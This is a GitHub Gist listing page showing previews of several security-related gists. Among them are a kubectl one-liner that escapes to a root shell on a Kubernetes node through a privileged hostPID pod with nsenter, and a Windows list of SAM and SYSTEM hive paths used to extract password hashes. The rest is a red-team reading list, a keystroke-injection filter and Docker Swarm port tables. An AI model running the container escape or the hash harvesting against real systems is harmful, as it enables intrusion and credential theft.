Skip to content

Instantly share code, notes, and snippets.

View IanColdwater's full-sized avatar

Ian Coldwater IanColdwater

  • Minneapolis, MN
View GitHub Profile
@simonswine
simonswine / kubectl_root_host.sh
Created May 29, 2018 16:23
nsenter into the host
kubectl run hack1 --restart=Never -t -i -n kube-system --image overridden --overrides '{"spec":{"hostPID": true, "containers":[{"name":"busybox","image":"alpine:3.7","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"securityContext":{"privileged":true}}]}}' --rm --attach
@FrankSpierings
FrankSpierings / README.md
Last active August 7, 2024 12:19
Linux Container Escapes and Hardening
From: http://redteams.net/bookshelf/
Techie
Unauthorised Access: Physical Penetration Testing For IT Security Teams by Wil Allsopp.
Social Engineering: The Art of Human Hacking by Christopher Hadnagy
Practical Lock Picking: A Physical Penetration Tester's Training Guide by Deviant Ollam
The Art of Deception: Controlling the Human Element of Security by Kevin Mitnick
Hacking: The Art of Exploitation by Jon Erickson and Hacking Exposed by Stuart McClure and others.
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Fyodor
The Shellcoder's Handbook: Discovering and Exploiting Security Holes by several authors
@staaldraad
staaldraad / ioctlfilter.c
Created March 21, 2017 13:56
Filters keycodes from R400 presenter in Linux
/* Grabs all input from Logitech R400 presenter and filters to ensure only certain keys are pressed.
* Ensures that only valid R400 keys are pressed and not rogue keys injected.
* Main logic for this found here: http://stackoverflow.com/questions/7668872/need-to-intercept-hid-keyboard-events-and-then-block-them
* Author: Etienne Stalmans <etienne@sensepost.com>
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
@BretFisher
BretFisher / docker-swarm-ports.md
Last active August 12, 2024 16:10
Docker Swarm Port Requirements, both Swarm Mode 1.12+ and Swarm Classic, plus AWS Security Group Style Tables

Docker Swarm Mode Ports

Starting with 1.12 in July 2016, Docker Swarm Mode is a built-in solution with built-in key/value store. Easier to get started, and fewer ports to configure.

Inbound Traffic for Swarm Management

  • TCP port 2377 for cluster management & raft sync communications
  • TCP and UDP port 7946 for "control plane" gossip discovery communication between all nodes
  • UDP port 4789 for "data plane" VXLAN overlay network traffic
  • IP Protocol 50 (ESP) if you plan on using overlay network with the encryption option

AWS Security Group Example

@sckalath
sckalath / windows_blind
Created July 14, 2014 21:08
Windows Blind Files
%SYSTEMDRIVE%\boot.ini
%WINDIR%\win.ini This is another file that can be counted on to be readable by all users of a system.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM Stores user passwords in either an LM hash and/or an NTLM hash format. The SAM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\repair\system
%SYSTEMROOT%\System32\config\RegBack\system This is the SYSTEM registry hive. This file is needed to extract the user account password hashes from a Windows system. The SYSTEM file in \repair is locked, but can be retrieved using forensic or Volume Shadow copy methods.
%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM These files store the LM and NTLM hashes for local users. Using Volume Shadow Copy or Ninja Copy you can retrieve these files.
%WINDIR%\repair\sam
%WINDIR%\repair\system